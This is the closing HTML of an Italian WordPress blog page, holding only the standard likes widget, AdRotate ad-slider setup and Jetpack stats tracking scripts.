		<iframe src='https://widgets.wp.com/likes/master.html?ver=202006#ver=202006&amp;lang=it' scrolling='no' id='likes-master' name='likes-master' style='display:none;'></iframe>
	<div id='likes-other-gravatars'><div class="likes-text"><span>%d</span> blogger hanno fatto clic su Mi Piace per questo: </div><ul class="wpl-avatars sd-like-gravatars"></ul></div>
	<!-- AdRotate JS -->
<script type="text/javascript">
jQuery(document).ready(function(){
if(jQuery.fn.gslider) {
	jQuery('.g-2').gslider({ groupid: 2, speed: 12000 });
	jQuery('.g-3').gslider({ groupid: 3, speed: 6000 });
	jQuery('.g-4').gslider({ groupid: 4, speed: 6000 });
	jQuery('.g-5').gslider({ groupid: 5, speed: 3000 });
	jQuery('.g-6').gslider({ groupid: 6, speed: 3000 });
	jQuery('.g-7').gslider({ groupid: 7, speed: 3000 });
}
});
</script>
<!-- /AdRotate JS -->

<script type='text/javascript' src='https://stats.wp.com/e-202006.js' async='async' defer='defer'></script>
<script type='text/javascript'>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:7.0.2',blog:'114838088',post:'24550',tz:'1',srv:'www.calcioui.eu'} ]);
	_stq.push([ 'clickTrackerInit', '114838088', '24550' ]);
</script>

</body>
</html>